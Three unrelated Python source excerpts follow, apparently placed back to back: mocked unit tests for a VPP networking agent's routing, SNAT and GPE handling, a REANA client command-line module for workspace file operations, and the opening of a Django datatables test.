def test_create_router_external_gateway_with_snat_int_and_ip_set(
self, m_network_on_host):
router = self._get_mock_external_router()
interface_ip = router['gateways'][0][0]
prefixlen = router['gateways'][0][1]
m_network_on_host.return_value = {'bridge_domain_id': 'fake_dom_id'}
with mock.patch.object(self.vpp.vpp, 'get_bridge_bvi',
return_value=5):
with mock.patch.object(self.vpp.vpp, 'get_snat_interfaces',
return_value=[5]):
with mock.patch.object(
self.vpp.vpp, 'get_interface_ip_addresses',
return_value=[]):
self.vpp.ensure_router_interface_on_host(
uuidgen.uuid1(), router)
self.vpp.vpp.set_snat_on_interface.assert_not_called()
self.vpp.vpp.set_interface_ip.assert_called_once_with(
5, iface(interface_ip, prefixlen))
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager.' +
'ensure_network')
def test_create_router_external_gateway_snat_int_ip_and_ext_gw_set(
self, m_network_on_host):
router = self._get_mock_external_router()
interface_ip = router['gateways'][0][0]
prefixlen = router['gateways'][0][1]
m_network_on_host.return_value = {'bridge_domain_id': 'fake_dom_id'}
with mock.patch.object(self.vpp.vpp, 'get_bridge_bvi',
return_value=5):
with mock.patch.object(self.vpp.vpp, 'get_snat_interfaces',
return_value=[5]):
with mock.patch.object(
self.vpp.vpp, 'get_interface_ip_addresses',
return_value=[
iface(ip_address(interface_ip), prefixlen)]):
self.vpp.ensure_router_interface_on_host(
uuidgen.uuid1(), router)
self.vpp.vpp.set_snat_on_interface.assert_not_called()
self.vpp.vpp.set_interface_ip.assert_not_called()
def test_delete_router_external_gateway_on_host(self):
router_port = self._get_mock_router_external_interface()
port_id = uuidgen.uuid1()
self.vpp.router_external_interfaces[port_id] = router_port
with mock.patch.object(self.vpp.vpp, 'get_snat_interfaces',
return_value=[router_port['bvi_if_idx']]):
with mock.patch.object(self.vpp.vpp,
'get_outside_snat_interface_indices',
return_value=[router_port['bvi_if_idx']]):
with mock.patch.object(
self.vpp.vpp,
'get_interface_ip_addresses',
return_value=[
iface(ip_address(router_port['gateway_ip']),
router_port['prefixlen'])]):
with mock.patch.object(self.vpp.vpp,
'get_bridge_bvi',
return_value=router_port[
'bvi_if_idx']):
self.vpp.delete_router_interface_on_host(port_id)
self.vpp.vpp.set_snat_on_interface.\
assert_called_once_with(router_port['bvi_if_idx'],
is_inside=False,
is_add=False)
self.vpp.vpp.snat_overload_on_interface_address.\
assert_called_once_with(router_port['bvi_if_idx'],
is_add=False)
self.vpp.vpp.delete_loopback.assert_called_once_with(
router_port['bvi_if_idx'])
def test_delete_router_external_gateway_no_snat_addr(self):
router_port = self._get_mock_router_external_interface()
port_id = uuidgen.uuid1()
self.vpp.router_external_interfaces[port_id] = router_port
with mock.patch.object(self.vpp.vpp, 'get_snat_interfaces',
return_value=[]):
with mock.patch.object(self.vpp.vpp,
'get_outside_snat_interface_indices',
return_value=[]):
with mock.patch.object(
self.vpp.vpp, 'get_bridge_bvi',
return_value=router_port['bvi_if_idx']):
with mock.patch.object(
self.vpp.vpp, 'get_interface_ip_addresses',
return_value=[
iface(router_port['gateway_ip'],
router_port['prefixlen'])]):
self.vpp.delete_router_interface_on_host(port_id)
self.vpp.vpp.set_snat_on_interface.\
assert_not_called()
self.vpp.vpp.snat_overload_on_interface_address.\
assert_not_called()
self.vpp.vpp.delete_loopback.assert_called_once_with(
router_port['bvi_if_idx'])
def test_delete_router_external_gateway_no_snat_addr_and_no_ext_gw(self):
router_port = self._get_mock_router_external_interface()
port_id = uuidgen.uuid1()
self.vpp.router_external_interfaces[port_id] = router_port
with mock.patch.object(self.vpp.vpp, 'get_snat_interfaces',
return_value=[]):
with mock.patch.object(self.vpp.vpp,
'get_outside_snat_interface_indices',
return_value=[]):
with mock.patch.object(self.vpp.vpp,
'get_bridge_bvi', return_value=None):
with mock.patch.object(
self.vpp.vpp, 'get_interface_ip_addresses',
return_value=[]):
self.vpp.delete_router_interface_on_host(port_id)
self.vpp.vpp.set_snat_on_interface.\
assert_not_called()
self.vpp.vpp.snat_overload_on_interface_address.\
assert_not_called()
self.vpp.vpp.delete_loopback.assert_not_called()
def test_v4_router_interface_create_on_host(self):
self._test_create_router_interface_on_host(
port=uuidgen.uuid1(),
router=self._get_mock_router_interface())
def test_v6_router_interface_create_on_host(self):
self._test_create_router_interface_on_host(
port=uuidgen.uuid1(),
router=self._get_mock_v6_router_interface())
def test_v4_router_interface_create_with_existing_bvi_and_ip(self):
self._test_create_router_interface_with_existing_bvi_and_ip(
port=uuidgen.uuid1(),
router=self._get_mock_router_interface())
def test_v6_router_interface_create_with_existing_bvi_and_ip(self):
self._test_create_router_interface_with_existing_bvi_and_ip(
port=uuidgen.uuid1(),
router=self._get_mock_v6_router_interface())
def test_v4_router_interface_create_with_existing_bvi_different_ip(self):
self._test_create_router_interface_with_existing_bvi_different_ip(
port=uuidgen.uuid1(),
router=self._get_mock_router_interface(),
other_router=self._get_mock_v6_router_interface())
def test_v6_router_interface_create_with_existing_bvi_different_ip(self):
self._test_create_router_interface_with_existing_bvi_different_ip(
port=uuidgen.uuid1(),
router=self._get_mock_v6_router_interface(),
other_router=self._get_mock_router_interface())
def test_v4_router_interface_delete(self):
self._test_delete_router_interface_on_host(
port=uuidgen.uuid1(), is_ipv6=False)
def test_v6_router_interface_delete(self):
self._test_delete_router_interface_on_host(
port=uuidgen.uuid1(), is_ipv6=True)
def test_v4_router_interface_delete_with_multiple_interfaces(self):
self._test_delete_router_interface_with_multiple_interfaces(
port=uuidgen.uuid1(), is_ipv6=False)
def test_v6_router_interface_delete_with_multiple_interfaces(self):
self._test_delete_router_interface_with_multiple_interfaces(
port=uuidgen.uuid1(), is_ipv6=True)
def test_create_floatingip_on_vpp(self):
"""Test create floatingip processing.
Verify that the SNAT create APIs are called.
"""
floatingip_dict = self._get_mock_floatingip()
self.vpp.vpp.get_interface_vrf.return_value = floatingip_dict[
'tenant_vrf']
floatingip_uuid = floatingip_dict['UUID']
mock.patch.object(self.vpp, '_get_snat_indexes',
return_value=(
floatingip_dict['loopback_idx'],
floatingip_dict['external_idx'])).start()
self.vpp.associate_floatingip(floatingip_uuid, floatingip_dict)
self.vpp.vpp.get_snat_interfaces.return_value = []
self.vpp.vpp.set_snat_on_interface.assert_any_call(
floatingip_dict['loopback_idx'])
self.vpp.vpp.set_snat_on_interface.assert_any_call(
floatingip_dict['external_idx'], is_inside=0)
self.vpp.vpp.get_interface_vrf.assert_called_with(1)
self.assertEqual(self.vpp.vpp.set_snat_static_mapping.call_count, 1)
self.vpp.vpp.set_snat_static_mapping.assert_called_once_with(
ip_address(floatingip_dict['fixed_ip_address']),
ip_address(floatingip_dict['floating_ip_address']),
floatingip_dict['tenant_vrf'])
self.vpp.vpp.clear_snat_sessions.assert_called_once_with(
ip_address(floatingip_dict['fixed_ip_address']))
def test_create_floatingip_on_vpp_existing_entry(self):
"""Test create floatingip processing with existing indexes.
Verify that the SNAT interfaces are not created if they already
exist on the VPP.
"""
floatingip_dict = self._get_mock_floatingip()
self.vpp.vpp.get_snat_interfaces.return_value = [4, 5]
self.vpp.vpp.get_interface_vrf.return_value = 1
mock.patch.object(self.vpp, '_get_snat_indexes',
return_value=(4, 5)).start()
value = mock.MagicMock()
value.local_ip_address = ip_address(
floatingip_dict['fixed_ip_address'])
value.external_ip_address = ip_address(
floatingip_dict['floating_ip_address'])
value.vrf_id = 1
self.vpp.vpp.get_snat_static_mappings.return_value = [value]
self.vpp.associate_floatingip(floatingip_dict['floating_ip_address'],
floatingip_dict)
self.assertFalse(self.vpp.vpp.set_snat_on_interface.call_count)
self.assertFalse(self.vpp.vpp.set_snat_static_mapping.call_count)
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager')
def test_create_floatingip_on_vpp_no_internal_network(self,
mock_net_driver):
"""Test create floatingip processing without an internal network.
Verify that the SNAT interfaces are not created when the
internal network (router interface) hasn't been created.
"""
floatingip_dict = self._get_mock_floatingip()
self.vpp.net_driver = mock_net_driver
mock_net_driver.ensure_network.return_value = None
self.vpp.associate_floatingip(floatingip_dict['floating_ip_address'],
floatingip_dict)
self.assertFalse(self.vpp.vpp.set_snat_on_interface.call_count)
def test_delete_floatingip_on_vpp(self):
"""Test delete floatingip processing.
Verify that the SNAT delete APIs are called.
"""
floatingip_dict = self._get_mock_floatingip()
floating_ip = floatingip_dict['floating_ip_address']
self.vpp.floating_ips[floating_ip] = floatingip_dict
self.vpp.vpp.get_snat_local_ipaddresses.return_value = [
floatingip_dict['fixed_ip_address']]
self.vpp.disassociate_floatingip(floating_ip)
self.vpp.vpp.set_snat_static_mapping.assert_called_once_with(
ip_address(floatingip_dict['fixed_ip_address']),
ip_address(floatingip_dict['floating_ip_address']),
floatingip_dict['tenant_vrf'],
is_add=0)
self.assertIsNone(self.vpp.floating_ips.get(floating_ip))
def test_delete_floatingip_on_vpp_non_existing(self):
"""Test delete a non-exisiting floatingip within VPP.
Verify that a SNAT delete operation is not performed.
"""
floatingip_dict = self._get_mock_floatingip()
floating_ip = floatingip_dict['floating_ip_address']
self.vpp.floating_ips[floating_ip] = floatingip_dict
self.vpp.vpp.get_snat_local_ipaddresses.return_value = []
self.vpp.disassociate_floatingip(floating_ip)
self.vpp.vpp.set_snat_static_mapping.assert_not_called()
self.assertIsNone(self.vpp.floating_ips.get(floating_ip))
def test_ensure_gpe_network_on_host(self):
self.vpp.gpe = gpe.GPEForwarder(self.vpp)
self.vpp.mac_age = 300
self.vpp.gpe.gpe_locators = "test_net"
physnet, net_type, seg_id = 'test_net', 'gpe', 5000
self.vpp.gpe.gpe_src_cidr = "10.1.1.1/24"
self.vpp.vpp.get_bridge_domains.return_value = []
self.vpp.vpp.get_lisp_vni_to_bd_mappings.return_value = []
ret_val = self.net_driver.ensure_network(physnet, net_type, seg_id)
self.vpp.vpp.create_bridge_domain.assert_called_once_with(
70000, 300)
self.vpp.vpp.add_lisp_vni_to_bd_mapping.assert_called_once_with(
vni=5000, bridge_domain=70000)
self.vpp.vpp.set_interface_ip.assert_called_once_with(
720,
ip_interface("10.1.1.1/24"))
self.vpp.vpp.set_interface_tag.assert_called_with(
720, 'net-vpp.physnet:test_net')
network_data = self.net_driver.get_network('test_net', 'gpe', 5000)
expected_val = {'bridge_domain_id': 70000,
'if_physnet': "test_iface",
'if_uplink_idx': None,
'network_type': 'gpe',
'segmentation_id': 5000,
'physnet': 'test_net'}
self.assertEqual(network_data, expected_val)
self.assertEqual(ret_val, expected_val)
def test_delete_gpe_network_on_host(self):
self.vpp.gpe = gpe.GPEForwarder(self.vpp)
self.net_driver.networks = {}
gpe_lset_name = constants.GPE_LSET_NAME
self.vpp.physnets = {"test_net": "test_iface"}
physnet, net_type, seg_id = 'test_net', 'gpe', 5000
mock_data = {'bridge_domain_id': 70000,
'if_physnet': "test_iface",
'if_uplink_idx': 720,
'network_type': 'gpe',
'segmentation_id': 5000,
'physnet': "test_net"}
mock_gpe_local_map_data = {'vnis': set([5000])}
mock_gpe_remote_map_data = {('1:1:1:1:1:1', 5000): '1.1.1.1',
('2:2:2:2:2:2', 5000): '2.2.2.2',
('3:3:3:3:3:3', 5001): '3.3.3.3'
}
self.vpp.vpp.get_lisp_vni_to_bd_mappings.return_value = [(5000,
70000)]
self.vpp.gpe.gpe_map[gpe_lset_name] = mock_gpe_local_map_data
self.vpp.gpe.gpe_map['remote_map'] = mock_gpe_remote_map_data
self.net_driver.networks[(physnet, net_type, seg_id)] = mock_data
self.net_driver.delete_network(physnet, net_type, seg_id)
self.vpp.vpp.del_lisp_vni_to_bd_mapping.assert_called_once_with(
vni=5000, bridge_domain=70000)
self.assertEqual(self.vpp.gpe.gpe_map[gpe_lset_name]['vnis'], set([]))
self.vpp.vpp.del_lisp_remote_mac.assert_any_call(
'1:1:1:1:1:1', 5000)
self.vpp.vpp.del_lisp_remote_mac.assert_any_call(
'2:2:2:2:2:2', 5000)
self.assertEqual(self.vpp.gpe.gpe_map['remote_map'], {
('3:3:3:3:3:3', 5001): '3.3.3.3'})
self.assertEqual(self.net_driver.networks, {})
@mock.patch(
'networking_vpp.agent.server.VPPForwarder.' +
'ensure_interface_in_vpp_bridge')
@mock.patch(
'networking_vpp.agent.server.VPPForwarder.ensure_interface_on_host')
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager')
def test_bind_gpe_interface_on_host(self,
mock_net_driver,
mock_ensure_int_on_host,
mock_ensure_int_in_bridge):
gpe_lset_name = constants.GPE_LSET_NAME
self.vpp.physnets = {"test_net": "test_iface"}
self.vpp.gpe = gpe.GPEForwarder(self.vpp)
self.vpp.gpe.gpe_locators = "test_net"
self.vpp.gpe.gpe_src_cidr = "10.1.1.1/24"
self.net_driver = mock_net_driver
mock_net_data = {'bridge_domain_id': 70000,
'if_physnet': "test_iface",
'if_uplink_idx': 720,
'network_type': 'gpe',
'segmentation_id': 5000,
'physnet': 'test_net'}
mock_props = {'iface_idx': 10,
'bind_type': 'vhostuser',
'mac': '11:11:11:11:11:11',
'path': '/tmp/fake-path'}
mock_gpe_map = {'vnis': set([]),
'sw_if_idxs': set([]),
'local_map': {}}
self.vpp.gpe.gpe_map[gpe_lset_name] = mock_gpe_map
mock_net_driver.ensure_network.return_value = mock_net_data
mock_ensure_int_on_host.return_value = mock_props
self.vpp.bind_interface_on_host('vhostuser', 'fake-uuid',
mock_props['mac'], 'test_net', 'gpe',
5000)
mock_ensure_int_in_bridge.assert_called_once_with(70000, 10)
self.assertEqual(
self.vpp.gpe.gpe_map[gpe_lset_name]['vnis'],
set([5000]))
self.vpp.vpp.add_lisp_local_mac.assert_called_once_with(
mock_props['mac'], 5000, gpe_lset_name)
self.assertEqual(
self.vpp.gpe.gpe_map[gpe_lset_name]['local_map'][mock_props[
'mac']], 5000)
def test_unbind_gpe_interface_on_host(self):
gpe_lset_name = constants.GPE_LSET_NAME
self.vpp.physnets = {"test_net": "test_iface"}
self.vpp.gpe = gpe.GPEForwarder(self.vpp)
self.vpp.gpe.gpe_locators = "test_net"
port_uuid = 'fake-port-uuid'
mock_net_data = {'bridge_domain_id': 70000,
'if_physnet': "test_iface",
'if_test_net_idx': 720,
'network_type': 'gpe',
'segmentation_id': 5000,
'physnet': 'test_net'}
mock_props = {'iface_idx': 10,
'bind_type': 'vhostuser',
'mac': '11:11:11:11:11:11',
'path': '/tmp/fake-path',
'net_data': mock_net_data}
mock_gpe_map = {'vnis': set([5000]),
'sw_if_indxs': set([720]),
'local_map': {'11:11:11:11:11:11': 5000}
}
self.vpp.vpp.get_lisp_vni_to_bd_mappings.return_value = [(5000,
70000)]
self.vpp.interfaces[port_uuid] = mock_props
self.net_driver.networks[('test_net', 'gpe', 5000)] = mock_net_data
self.vpp.gpe.gpe_map[gpe_lset_name] = mock_gpe_map
self.vpp.gpe.gpe_map['remote_map'] = {}
self.vpp.port_ips[port_uuid] = '1.1.1.1'
# Nominate an existing, empty bridge (70000) so that it gets deleted;
# bridges that no longer exist in VPP are not deleted.
self.vpp.vpp.get_bridge_domains.return_value = {70000: []}
self.vpp.unbind_interface_on_host(port_uuid)
self.vpp.vpp.del_lisp_local_mac.assert_called_once_with(
mock_props['mac'],
mock_net_data['segmentation_id'],
gpe_lset_name)
self.assertEqual(self.vpp.gpe.gpe_map[gpe_lset_name]['local_map'], {})
self.assertEqual(self.vpp.interfaces, {})
self.vpp.vpp.delete_bridge_domain.assert_called_once_with(
mock_net_data['bridge_domain_id'])
self.vpp.vpp.del_lisp_vni_to_bd_mapping.assert_called_once_with(
vni=mock_net_data['segmentation_id'],
bridge_domain=mock_net_data['bridge_domain_id'])
self.assertEqual(self.vpp.gpe.gpe_map[gpe_lset_name]['vnis'], set([]))
self.assertEqual(self.net_driver.networks, {})
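# For reference, a sketch of the gpe_map bookkeeping shape that the two GPE tests above
# exercise. The keys simply mirror the mocks used here; the real GPEForwarder may track
# additional state, and this constant is illustrative only.
_EXAMPLE_GPE_MAP = {
    constants.GPE_LSET_NAME: {
        'vnis': {5000},                              # VNIs bound on the locator set
        'sw_if_idxs': {720},                         # uplink sw_if indexes
        'local_map': {'11:11:11:11:11:11': 5000},    # local MAC -> VNI
    },
    'remote_map': {('1:1:1:1:1:1', 5000): '1.1.1.1'},  # (remote MAC, VNI) -> underlay IP
}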
@mock.patch('networking_vpp.agent.gpe.GpeListener')
@mock.patch('networking_vpp.agent.server.EtcdListener')
def test_ensure_remote_gpe_mapping(self, mock_etcd_listener,
mock_gpe_listener):
"""Test Adding remote GPE mappings.
Patch the EtcdListener object in and create a mock GpeWatcher.
Then simulate an mock_gpe_key add.
Test the remote mapping and ARP entry modules
"""
mock_gpe_key = "/networking-vpp/global/networks/gpe" + \
"/1077/ml-ucs-02/fa:16:3e:47:2e:3c/10.1.1.2"
mock_remote_ip = "1.1.1.1"
mock_bridge_domain = 66077
with patch.object(gpe.GpeWatcher, 'added',
autospec=True) as mock_add_key:
mock_etcd_client = mock.MagicMock()
mock_etcd_listener.gpe_listener = mock_gpe_listener
mock_etcd_listener.gpe_listener.\
is_valid_remote_map.return_value = True
self.vpp.physnets = {"test_net": "test_iface"}
self.vpp.gpe = gpe.GPEForwarder(self.vpp)
self.vpp.gpe.gpe_locators = "test_net"
mock_etcd_listener.vppf = self.vpp
gpe_lset_name = constants.GPE_LSET_NAME
self.vpp.gpe.gpe_map = {gpe_lset_name: {
'local_map': {},
'vnis': set(),
'sw_if_idxs': set()},
'remote_map': {}}
self.vpp.vpp.exists_lisp_arp_entry.return_value = False
underlay_ip_str = '1.1.1.1'
underlay_ip = ip_address(underlay_ip_str)
gpe.GpeWatcher(mock_etcd_client,
'gpe_watcher',
mock_gpe_key,
mock_etcd_listener).added(mock_gpe_key,
mock_remote_ip)
mock_add_key.assert_called_once_with(mock.ANY,
mock_gpe_key,
mock_remote_ip)
self.vpp.gpe.ensure_remote_gpe_mapping(1077, 'fa:16:3e:47:2e:3c',
'10.1.1.2', underlay_ip_str)
| |
# -*- coding: utf-8 -*-
#
# This file is part of REANA.
# Copyright (C) 2018, 2019, 2020, 2021, 2022 CERN.
#
# REANA is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""REANA client output related commands."""
import json
import logging
import os
import sys
import traceback
import click
from reana_commons.utils import click_table_printer
from reana_client.printer import display_message
from reana_client.api.utils import get_path_from_operation_id
from reana_client.cli.utils import (
add_access_token_options,
add_pagination_options,
add_workflow_option,
check_connection,
format_data,
human_readable_or_raw_option,
parse_filter_parameters,
parse_format_parameters,
)
from reana_client.config import JSON, URL
from reana_client.errors import FileDeletionError, FileUploadError
FILES_BLACKLIST = (".git/", "/.git/")
@click.group(help="Workspace file management commands")
@click.pass_context
def files_group(ctx):
"""Top level wrapper for files related interactions."""
logging.debug(ctx.info_name)
@files_group.command("ls")
@add_workflow_option
@check_connection
@click.option(
"--format",
"_format",
multiple=True,
help="Format output according to column titles or column values. "
"Use `<column_name>=<column_value>` format. For "
"E.g. display FILES named data.txt "
"`--format name=data.txt`.",
)
@click.option(
"--json",
"output_format",
flag_value="json",
default=None,
help="Get output in JSON format.",
)
@click.option(
"--url",
"output_format",
flag_value="url",
default=None,
help="Get URLs of output files.",
)
@click.option(
"--filter",
"filters",
multiple=True,
help="Filter results to show only files that match certain filtering "
"criteria such as file name, size or modification date."
"Use `--filter <columm_name>=<column_value>` pairs. "
"Available filters are ``name``, ``size`` and ``last-modified``.",
)
@click.argument("filename", metavar="SOURCE", nargs=1, required=False)
@human_readable_or_raw_option
@add_access_token_options
@add_pagination_options
@click.pass_context
def get_files(
ctx,
workflow,
_format,
filters,
output_format,
filename,
access_token,
page,
size,
human_readable_or_raw,
): # noqa: D301
"""List workspace files.
The ``ls`` command lists workspace files of a workflow specified by the
environment variable REANA_WORKON or provided as a command-line flag
``--workflow`` or ``-w``. The SOURCE argument is optional and specifies a
pattern matching files and directories.
Examples: \n
\t $ reana-client ls --workflow myanalysis.42 \n
\t $ reana-client ls --workflow myanalysis.42 --human-readable \n
\t $ reana-client ls --workflow myanalysis.42 'data/*root*' \n
\t $ reana-client ls --workflow myanalysis.42 --filter name=hello
""" # noqa: W605
import tablib
from reana_client.api.client import current_rs_api_client, list_files
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
search_filter = None
headers = ["name", "size", "last-modified"]
if filters:
_, search_filter = parse_filter_parameters(filters, headers)
if _format:
parsed_format_filters = parse_format_parameters(_format)
if workflow:
logging.info('Workflow "{}" selected'.format(workflow))
try:
response = list_files(
workflow, access_token, filename, page, size, search_filter
)
data = []
file_path = get_path_from_operation_id(
current_rs_api_client.swagger_spec.spec_dict["paths"], "download_file"
)
urls = []
for file_ in response:
if not file_["name"].startswith(FILES_BLACKLIST):
data.append(
list(
map(
str,
[
file_["name"],
file_["size"][human_readable_or_raw],
file_["last-modified"],
],
)
)
)
urls.append(
ctx.obj.reana_server_url
+ file_path.format(
workflow_id_or_name=workflow, file_name=file_["name"]
)
)
tablib_data = tablib.Dataset()
tablib_data.headers = headers
for row in data:
tablib_data.append(row)
if output_format == URL:
display_message("\n".join(urls))
elif _format:
tablib_data, filtered_headers = format_data(
parsed_format_filters, headers, tablib_data
)
if output_format == JSON:
display_message(json.dumps(tablib_data))
else:
tablib_data = [list(item.values()) for item in tablib_data]
click_table_printer(filtered_headers, filtered_headers, tablib_data)
else:
if output_format == JSON:
display_message(tablib_data.export(output_format))
else:
click_table_printer(headers, _format, data)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"Something went wrong while retrieving file list"
" for workflow {0}:\n{1}".format(workflow, str(e)),
msg_type="error",
)
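# A quick programmatic sketch of the same listing without the CLI layer. The argument
# order mirrors how get_files() above invokes list_files(); the workflow name, token,
# and pagination values below are placeholders, and filters are left unset.
def _example_list_files_directly():
    from reana_client.api.client import list_files
    return list_files("myanalysis.42", "<access-token>", None, 1, 10, None)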
@files_group.command("download")
@click.argument("filenames", metavar="FILES", nargs=-1)
@add_workflow_option
@check_connection
@click.option(
"-o",
"--output-directory",
default=os.getcwd(),
help="Path to the directory where files will be downloaded.",
)
@add_access_token_options
@click.pass_context
def download_files(
ctx, workflow, filenames, output_directory, access_token
): # noqa: D301
"""Download workspace files.
The ``download`` command allows downloading workspace files and directories.
By default, the files specified in the workflow specification as outputs
are downloaded. You can also specify the individual files you would like
to download, see examples below.
Examples: \n
\t $ reana-client download # download all output files \n
\t $ reana-client download mydata.tmp outputs/myplot.png
"""
from reana_client.api.client import download_file, get_workflow_specification
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if not filenames:
reana_spec = get_workflow_specification(workflow, access_token)["specification"]
if "outputs" in reana_spec:
filenames = []
filenames += reana_spec["outputs"].get("files", [])
filenames += reana_spec["outputs"].get("directories", [])
if workflow:
for file_name in filenames:
try:
binary_file, file_name = download_file(
workflow, file_name, access_token
)
logging.info(
"{0} binary file downloaded ... writing to {1}".format(
file_name, output_directory
)
)
outputs_file_path = os.path.join(output_directory, file_name)
if not os.path.exists(os.path.dirname(outputs_file_path)):
os.makedirs(os.path.dirname(outputs_file_path))
with open(outputs_file_path, "wb") as f:
f.write(binary_file)
display_message(
"File {0} downloaded to {1}.".format(file_name, output_directory),
msg_type="success",
)
except OSError as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"File {0} could not be written.".format(file_name),
msg_type="error",
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"File {0} could not be downloaded: {1}".format(file_name, e),
msg_type="error",
)
@files_group.command("upload")
@click.argument(
"filenames",
metavar="SOURCES",
type=click.Path(exists=True, resolve_path=True),
nargs=-1,
)
@add_workflow_option
@check_connection
@add_access_token_options
@click.pass_context
def upload_files(ctx, workflow, filenames, access_token): # noqa: D301
"""Upload files and directories to workspace.
The ``upload`` command allows to upload workflow input files and
directories. The SOURCES argument can be repeated and specifies which files
and directories are to be uploaded, see examples below. The default
behaviour is to upload all input files and directories specified in the
reana.yaml file.
Examples: \n
\t $ reana-client upload -w myanalysis.42 \n
\t $ reana-client upload -w myanalysis.42 code/mycode.py
"""
from reana_client.api.client import get_workflow_specification, upload_to_server
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if not filenames:
reana_spec = get_workflow_specification(workflow, access_token)["specification"]
if "inputs" in reana_spec:
filenames = []
filenames += [
os.path.join(os.getcwd(), f)
for f in reana_spec["inputs"].get("files") or []
]
filenames += [
os.path.join(os.getcwd(), d)
for d in reana_spec["inputs"].get("directories") or []
]
if workflow:
if filenames:
for filename in filenames:
try:
response = upload_to_server(workflow, filename, access_token)
for file_ in response:
if file_.startswith("symlink:"):
display_message(
"Symlink resolved to {}. "
"Uploaded hard copy.".format(file_[len("symlink:") :]),
msg_type="success",
)
else:
display_message(
"File {} was successfully uploaded.".format(file_),
msg_type="success",
)
except FileNotFoundError as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"File {0} could not be uploaded: "
"{0} does not exist.".format(filename),
msg_type="error",
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
except FileUploadError as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"Something went wrong while uploading {0}.\n"
"{1}".format(filename, str(e)),
msg_type="error",
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"Something went wrong while uploading {}: \n"
"{}".format(filename, str(e)),
msg_type="error",
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
@files_group.command("rm")
@click.argument("filenames", metavar="SOURCES", nargs=-1)
@add_workflow_option
@check_connection
@add_access_token_options
@click.pass_context
def delete_files(ctx, workflow, filenames, access_token): # noqa: D301
"""Delete files from workspace.
The ``rm`` command allow to delete files and directories from workspace.
Note that you can use glob to remove similar files.
Examples:\n
\t $ reana-client rm -w myanalysis.42 data/mydata.csv \n
\t $ reana-client rm -w myanalysis.42 'data/*root*'
""" # noqa: W605
from reana_client.api.client import delete_file
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if workflow:
for filename in filenames:
try:
response = delete_file(workflow, filename, access_token)
freed_space = 0
for file_ in response["deleted"]:
freed_space += response["deleted"][file_]["size"]
display_message(
f"File {file_} was successfully deleted.", msg_type="success"
)
for file_ in response["failed"]:
display_message(
"Something went wrong while deleting {}.\n"
"{}".format(file_, response["failed"][file_]["error"]),
msg_type="error",
)
if freed_space:
display_message(
f"{freed_space} bytes freed up.", msg_type="success"
)
except FileDeletionError as e:
display_message(str(e), msg_type="error")
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"Something went wrong while deleting {}".format(filename),
msg_type="error",
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
@files_group.command("mv")
@click.argument("source")
@click.argument("target")
@add_workflow_option
@check_connection
@add_access_token_options
@click.pass_context
def move_files(ctx, source, target, workflow, access_token): # noqa: D301
"""Move files within workspace.
The ``mv`` command allow to move the files within workspace.
Examples:\n
\t $ reana-client mv data/input.txt input/input.txt
"""
from reana_client.api.client import get_workflow_status, list_files, mv_files
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if workflow:
try:
current_status = get_workflow_status(workflow, access_token).get("status")
if current_status == "running":
display_message(
"File(s) could not be moved for running workflow", msg_type="error",
)
sys.exit(1)
files = list_files(workflow, access_token)
current_files = [file["name"] for file in files]
if not any(source in item for item in current_files):
display_message(
"Source file(s) {} does not exist in "
"workspace {}".format(source, current_files),
msg_type="error",
)
sys.exit(1)
mv_files(source, target, workflow, access_token)
display_message(
"{} was successfully moved to {}.".format(source, target),
msg_type="success",
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message("Something went wrong. {}".format(e), msg_type="error")
@files_group.command("du")
@add_workflow_option
@check_connection
@add_access_token_options
@click.option("-s", "--summarize", is_flag=True, help="Display total.")
@click.option(
"--filter",
"filters",
multiple=True,
help="Filter results to show only files that match certain filtering "
"criteria such as file name or size."
"Use `--filter <columm_name>=<column_value>` pairs. "
"Available filters are ``name`` and ``size``.",
)
@human_readable_or_raw_option
@click.pass_context
def workflow_disk_usage(
ctx, workflow, access_token, summarize, filters, human_readable_or_raw
): # noqa: D301
"""Get workspace disk usage.
The ``du`` command allows checking the disk usage of a given workspace.
Examples: \n
\t $ reana-client du -w myanalysis.42 -s \n
\t $ reana-client du -w myanalysis.42 -s --human-readable \n
\t $ reana-client du -w myanalysis.42 --filter name=data/
"""
from reana_client.api.client import get_workflow_disk_usage
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
search_filter = None
headers = ["size", | |
"""
Test suite for the productdb.datatables module
"""
import pytest
from urllib.parse import quote
from django.contrib.auth.models import User
from django.urls import reverse
from django.test import Client
from rest_framework import status
from app.productdb import models
from app.productdb.models import UserProfile, Vendor
pytestmark = pytest.mark.django_db
AUTH_USER = {
"username": "api",
"password": "<PASSWORD>"
}
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
def test_datatables_search_on_vendor_products_endpoint():
test_pid_search_term = "Test Product ID"
v1 = Vendor.objects.get(name="Cisco Systems")
for e in range(1, 50):
